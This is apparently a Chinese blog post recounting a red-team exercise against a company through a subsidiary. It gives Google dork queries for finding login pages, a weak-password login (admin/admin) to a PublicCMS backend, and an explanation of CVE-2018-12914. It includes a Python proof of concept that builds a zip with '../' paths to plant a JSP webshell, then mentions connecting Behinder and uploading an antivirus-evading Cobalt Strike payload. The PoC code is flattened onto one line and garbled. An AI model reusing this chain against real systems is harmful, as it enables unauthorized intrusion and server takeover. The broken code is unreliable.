当前位置: 首页 > news >正文

某次护网红队getshell的经历

信息收集

某企业提供信息:企业官网的真实外网ip,内网ip

企业官网比较硬,从控股超过51%的子公司入手

通过企查查找到一堆控股高的子公司,通过ICP/IP地址/域名信息备案管理系统查找子公司官网,收集二级域名。通过googlehacking查找登录页面,发现一个管理后台登录页面

site:target.com intext:管理 | 后台 | 后台管理 | 登陆 | 登录 | 用户名 | 密码 | 系统 | 账号 | login | system
site:target.com inurl:login | inurl:admin | inurl:manage | inurl:manager | inurl:admin_login | inurl:system | inurl:backend
site:target.com intitle:管理 | 后台 | 后台管理 | 登陆 | 登录

登录页面没有任何验证码,bp进行弱密码爆破

admin/admin

登录后台发现是一个publiccms,可以查看web下的静态文件和执行sql,查找框架相关漏洞

根据数据目录可以知道上传的文件目录不在web目录下,所以直接上传jsp木马无效

在这里插入图片描述

CVE-2018-12914

漏洞编号:CVE-2018-12914

漏洞危害:用户通过在压缩文件中构造包含有特定文件名称的压缩文件时,在进行解压时,会导致跨目录任意写入文件漏洞的攻击。

影响版本:PublicCMS V4.0.20180210

漏洞加固:更新到最新版本 。对比补丁,发现在获取压缩文件中的文件名字时,如果其中含有”…”时则被替换为空。

漏洞原因

controller目录下\admin\cms\CmsWebFileAdminController.java代码里的uzip调用方式上出现了漏洞,该系统采用的是dounzip的方式去调用,dounzip是解压缩常用到的,导致我们可以构造特殊的文件名,来将我们的脚本木马上传到网站任意目录下。

该代码通过获取targetPath的上传路径值与压缩文件里的名字进行自动拼接,在拼接的这个过程当中,…/ 可以对目录进行跨站。网站漏洞产生最根本的原因就是在处理这个压缩文件的时候并没有对压缩里的文件名进行判断与过滤,导致可以使用特殊的文件名进行定义,并传入到服务器后端执行代码,通过上传JSP木马后门,可以直接对服务器进行控制,危害性较高。

getshell

poc

import zipfileif __name__ == "__main__":try:binary = 'coelak'     //木马内容zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)info = zipfile.ZipInfo("test.zip")zipFile.writestr("../../../../../../cmd.jsp", binary)zipFile.close()except IOError as e:raise e

构造一个zip压缩文件,里面的文件名为

../../../../../../../../工作站目录/webapps/publiccms/cccaaacoleak.jsp

上传该zip文件,上传和解压,cccaaacoleak.jsp会写入在publiccms目录下。成功getshell,连接冰蝎

然后上传免杀cs马,进行内网渗透了。

http://www.lryc.cn/news/151561.html

相关文章:

  • C#实现日期选择器、显示当地时间、跑马灯等功能
  • 如何让看书变听书?
  • pytorch异常——loss异常,不断增大,并且loss出现inf
  • Lua学习(一)
  • Python:列表推导式
  • 应急三维电子沙盘数字孪生系统
  • LeetCode每日一题:1654. 到家的最少跳跃次数(2023.8.30 C++)
  • 数据结构例题代码及其讲解-栈与队列
  • 【Spark】Pyspark RDD
  • 数学建模:Logistic回归预测
  • 一个面向MCU的小型前后台系统
  • 软件外包开发人员分类
  • HTML 元素被定义为块级元素或内联元素
  • 单调递增的数字【贪心算法】
  • gnuradio-hackrf_info.exe -FM频率使用
  • JVM学习(三)--生产环境的线程问题诊断
  • PHP数组处理$arr1转换为$arr2
  • ATF(TF-A)安全通告 TFV-10 (CVE-2022-47630)
  • 详解 SpringMVC 中获取请求参数
  • Message: ‘chromedriver‘ executable may have wrong permissions.
  • 每日一题 1372二叉树中的最长交错路径
  • 【力扣每日一题】2023.9.2 最多可以摧毁的敌人城堡数量
  • kotlin实现java的单例模式
  • 使用 KeyValueDiffers 检测Angular 对象的变化
  • Macos 10.13.2安装eclipse
  • Android逆向学习(一)vscode进行android逆向修改并重新打包
  • 【深入浅出设计模式--状态模式】
  • Debezium系列之:Debezium Server在生产环境大规模应用详细的技术方案
  • Echart笔记
  • docker 笔记1